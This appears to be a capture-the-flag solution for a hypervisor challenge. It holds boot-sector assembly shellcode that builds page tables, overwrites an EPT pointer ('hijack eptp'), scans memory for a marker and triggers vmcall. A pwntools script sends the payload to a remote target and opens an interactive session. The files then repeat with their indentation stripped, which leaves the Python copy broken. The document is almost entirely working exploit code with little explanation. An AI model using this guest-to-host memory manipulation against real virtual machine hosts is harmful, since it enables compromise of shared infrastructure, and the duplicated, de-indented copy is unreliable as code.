elnx/sc.asm Secret

## sc.asm
; nasm -fbin  sc.asm -o sc
; some code from https://github.com/gamozolabs/chocolate_milk
[org 0xf000]
[bits 16]
entry:
    ; Disable interrupts and clear direction flag
    cli
    cld

    mov ecx, 0x1000
    mov edx, 0xf000
self_copy:
    mov al, [cs:edx]
    mov [ds:edx], al
    inc edx
    loop self_copy
    ; Set the A20 line
    ; in    al, 0x92
    ; or    al, 2
    ; out 0x92, al

    ; Clear DS
    xor ax, ax
    mov ds, ax

    ; Load a 32-bit GDT
    lgdt [gdt]
    ; Enable protected mode
    mov eax, cr0
    or  eax, (1 << 0)
    mov cr0, eax

    ; Transition to 32-bit mode by setting CS to a protected mode selector
    jmp 0x0018:pm_entry

[bits 32]
pm_entry:
    ; Set up all data selectors
    mov ax, 0x20
    mov es, ax
    mov ds, ax
    mov fs, ax
    mov gs, ax
    mov ss, ax

    mov esp, 0x8000
    mov dword [0], 0x3d000000+0x1000+7
    mov dword [0+0x1000], 0x3d000000+0x2000+7
    mov dword [0+0x2000], 0x3d000000+0x3000+7
    ; code
    mov dword [0+0x3000+0xff*8], 0x3d000000+0xff000+0x477
    mov dword [0+0x3000+0xf*8],  0x3d000000+0xf000+0x477
    ; stack
    mov dword [0+0x3000+8*8], 0x3d000000+0x8000+0x477
    ; pde
    mov dword [0+0x3000+3*8], 0x3d000000+0x3000+0x477
    ; hijack eptp
    mov dword [0x200000], 0x3d00005e

    cpuid

    mov edi, 0x10000
    or edi, 0x477
loop:
    mov dword [0+0x3000+4*8], edi
    cpuid
    mov eax, [0x4000]
    and eax, 0xffffff
    cmp eax, 0x303030
    je found
    add edi, 0x10000
    cmp edi, 0x40000000+0x477
    jae fail
    jmp loop

found:
    mov eax, [0x4000]
    mov ebx, [0x4000+4]
    mov ecx, [0x4000+4*2]
    mov edx, [0x4000+4*3]
    mov esi, [0x4000+4*4]
    mov edi, [0x4000+4*5]
    vmcall

fail:
    hlt

align 8
gdt_base:
    dq 0x0000000000000000 ; 0x0000 | Null descriptor
    dq 0x00009a007c00ffff ; 0x0008 | 16-bit, present, code, base 0x7c00
    dq 0x000092000000ffff ; 0x0010 | 16-bit, present, data, base 0
    dq 0x00cf9a000000ffff ; 0x0018 | 32-bit, present, code, base 0
    dq 0x00cf92000000ffff ; 0x0020 | 32-bit, present, data, base 0
    dq 0x00209a0000000000 ; 0x0028 | 64-bit, present, code, base 0
    dq 0x0000920000000000 ; 0x0030 | 64-bit, present, data, base 0

gdt:
    dw (gdt - gdt_base) - 1
    dd gdt_base

times 0x1fe - ($ - $$) db 0
db 0x55, 0xaa


## solve.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import os
import sys

context.log_level = 'info'

def exploit(r):
    r.recvuntil('#mmm"  #mmmmm')
    payload = read('sc.o')
    packet = ''
    for i in payload:
        packet += '\x16' + i

    r.sendline(packet)

    r.interactive()

if __name__ == '__main__':
    if len(sys.argv) > 2:
        r = remote(sys.argv[1], int(sys.argv[2]))
    else:
        r = process('./%s' % (sys.argv[1]))
    exploit(r)
	; nasm -fbin sc.asm -o sc
	; some code from https://github.com/gamozolabs/chocolate_milk
	[org 0xf000]
	[bits 16]
	entry:
	; Disable interrupts and clear direction flag
	cli
	cld

	mov ecx, 0x1000
	mov edx, 0xf000
	self_copy:
	mov al, [cs:edx]
	mov [ds:edx], al
	inc edx
	loop self_copy
	; Set the A20 line
	; in al, 0x92
	; or al, 2
	; out 0x92, al

	; Clear DS
	xor ax, ax
	mov ds, ax

	; Load a 32-bit GDT
	lgdt [gdt]
	; Enable protected mode
	mov eax, cr0
	or eax, (1 << 0)
	mov cr0, eax

	; Transition to 32-bit mode by setting CS to a protected mode selector
	jmp 0x0018:pm_entry

	[bits 32]
	pm_entry:
	; Set up all data selectors
	mov ax, 0x20
	mov es, ax
	mov ds, ax
	mov fs, ax
	mov gs, ax
	mov ss, ax

	mov esp, 0x8000
	mov dword [0], 0x3d000000+0x1000+7
	mov dword [0+0x1000], 0x3d000000+0x2000+7
	mov dword [0+0x2000], 0x3d000000+0x3000+7
	; code
	mov dword [0+0x3000+0xff*8], 0x3d000000+0xff000+0x477
	mov dword [0+0x3000+0xf*8], 0x3d000000+0xf000+0x477
	; stack
	mov dword [0+0x3000+8*8], 0x3d000000+0x8000+0x477
	; pde
	mov dword [0+0x3000+3*8], 0x3d000000+0x3000+0x477
	; hijack eptp
	mov dword [0x200000], 0x3d00005e

	cpuid

	mov edi, 0x10000
	or edi, 0x477
	loop:
	mov dword [0+0x3000+4*8], edi
	cpuid
	mov eax, [0x4000]
	and eax, 0xffffff
	cmp eax, 0x303030
	je found
	add edi, 0x10000
	cmp edi, 0x40000000+0x477
	jae fail
	jmp loop

	found:
	mov eax, [0x4000]
	mov ebx, [0x4000+4]
	mov ecx, [0x4000+4*2]
	mov edx, [0x4000+4*3]
	mov esi, [0x4000+4*4]
	mov edi, [0x4000+4*5]
	vmcall

	fail:
	hlt

	align 8
	gdt_base:
	dq 0x0000000000000000 ; 0x0000 \| Null descriptor
	dq 0x00009a007c00ffff ; 0x0008 \| 16-bit, present, code, base 0x7c00
	dq 0x000092000000ffff ; 0x0010 \| 16-bit, present, data, base 0
	dq 0x00cf9a000000ffff ; 0x0018 \| 32-bit, present, code, base 0
	dq 0x00cf92000000ffff ; 0x0020 \| 32-bit, present, data, base 0
	dq 0x00209a0000000000 ; 0x0028 \| 64-bit, present, code, base 0
	dq 0x0000920000000000 ; 0x0030 \| 64-bit, present, data, base 0

	gdt:
	dw (gdt - gdt_base) - 1
	dd gdt_base

	times 0x1fe - ($ - $$) db 0
	db 0x55, 0xaa
	#!/usr/bin/env python
	# -- coding: utf-8 --
	from pwn import *
	import os
	import sys

	context.log_level = 'info'

	def exploit(r):
	r.recvuntil('#mmm" #mmmmm')
	payload = read('sc.o')
	packet = ''
	for i in payload:
	packet += '\x16' + i

	r.sendline(packet)

	r.interactive()

	if __name__ == '__main__':
	if len(sys.argv) > 2:
	r = remote(sys.argv[1], int(sys.argv[2]))
	else:
	r = process('./%s' % (sys.argv[1]))
	exploit(r)